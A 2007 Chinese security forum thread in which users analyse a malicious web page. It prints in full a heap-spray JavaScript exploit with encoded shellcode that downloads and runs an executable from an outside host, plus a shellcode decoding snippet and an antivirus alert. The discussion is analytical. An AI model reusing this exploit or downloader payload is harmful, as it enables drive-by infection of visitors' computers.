kv你够nb就给我把这网页杀了[md5:aab3f]

icka

原帖由 solcroft 于 2007-6-17 17:16 发表
开玩笑程序，不是病毒
挺好玩的

那个js你解密了吗？

1. 
   
2. <SCRIPT language="javascript">
   
3. var cvzkoAmeM = 0x07000000;
   
4. var ZcQqzEMqCqxFiLcBXzeSi = unescape("%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u2e00%u5c2e%u2e4c%u7865%u0065%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a%u622f%u6f6c%u2e67%u6968%u7073%u7361%u6365%u632e%u6d6f%u6c2f%u6261%u726f%u7461%u726f%u6f69%u722f%u6365%u7275%u6f73%u2f73%u6e61%u2f69%u6568%u7461%u652e%u6578%u0000");
   
5. var ruIkOArwUT = 0x400000;
   
6. var QBFsMnqdAr = ZcQqzEMqCqxFiLcBXzeSi.length * 4;
   
7. var lXvvcFsuXr = ruIkOArwUT - (QBFsMnqdAr+0x38);
   
8. var YHPRWlSAts = unescape("%u4141%u4141");
   
9. YHPRWlSAts = XeJzfAckyrTT(YHPRWlSAts,lXvvcFsuXr);
   
10. PPaWjWZuOCGL = (cvzkoAmeM - 0x100000)/ruIkOArwUT;
    
11. memory = new Array();
    
12. for (i=0;i<PPaWjWZuOCGL;i++)
    
13. {
    
14.   memory[i] = YHPRWlSAts + ZcQqzEMqCqxFiLcBXzeSi;
    
15. }
    
16. document.write("<HTML><BODY style="CURSOR: url('xrWqbcVOWnezXCS.YtVyFreutFltHSd')">    </BODY></HTML>")
    
17. function XeJzfAckyrTT(YHPRWlSAts, lXvvcFsuXr)
    
18. {
    
19.   while (YHPRWlSAts.length*2<lXvvcFsuXr)
    
20.   {
    
21.    YHPRWlSAts += YHPRWlSAts;
    
22.   }
    
23.   YHPRWlSAts = YHPRWlSAts.substring(0,lXvvcFsuXr/2);
    
24.   return YHPRWlSAts;
    
25. }
    
26. </SCRIPT>
    
27. 
    

复制代码

就是这个哦.
那个地址是
%u3574是内存地址?这个不懂了,病毒地址是附录在这段代码的最后那部分解出来的.

看这个代码和雅虎的那个头像似啊,因为手里没有雅虎的那个代码,所以估计..这个猜测这个就是用的那个雅虎的.

这个大体形式和那个QQ o-day漏洞还有XML的那个也是吧.

solcroft

我就是解到这里... 然后不懂了
unescape怎么会5字节的？

taihuxian

Virus: Exploit.Win32.IMG-ANI.af

Virus found while downloading Web content.

Address: bbs.kafan.cn

2007-6-17,21:03:34 [WARNING] Contains signature of the joke program JOKE/Schmilz!
  C:\WINDOWS\Temp\_avast4_\unp176499747.tmp
      [INFO] No action will be taken on the file.

icka

原帖由 solcroft 于 2007-6-17 18:04 发表
我就是解到这里... 然后不懂了
unescape怎么会5字节的？

1. 
   
2. <script language=javascript>
   
3. string="%u6800%u7474%u3a70";
   
4. ustr=unescape(string);
   
5. var code;
   
6. var high,low=0;
   
7. for(var i=0;i<ustr.length;i++)
   
8. {
   
9. code=ustr.charCodeAt(i);
   
10. low=code%256;
    
11. high=(code-low)/256;
    
12. document.write(String.fromCharCode(low)+String.fromCharCode(high));
    
13. }
    
14. </script>
    

复制代码

自己替换里面的%u....那部分.
本来想贴原来日志的地址的,可过去看好像已经编辑掉了,就留我的那个吧.
http://www.icka.com.cn/blog/read.php?87
应该这个类似.

solcroft

谢谢指点

icka

这个是死鱼http://hi.baidu.com/bjshiyu
写的,我只是拿来主义~~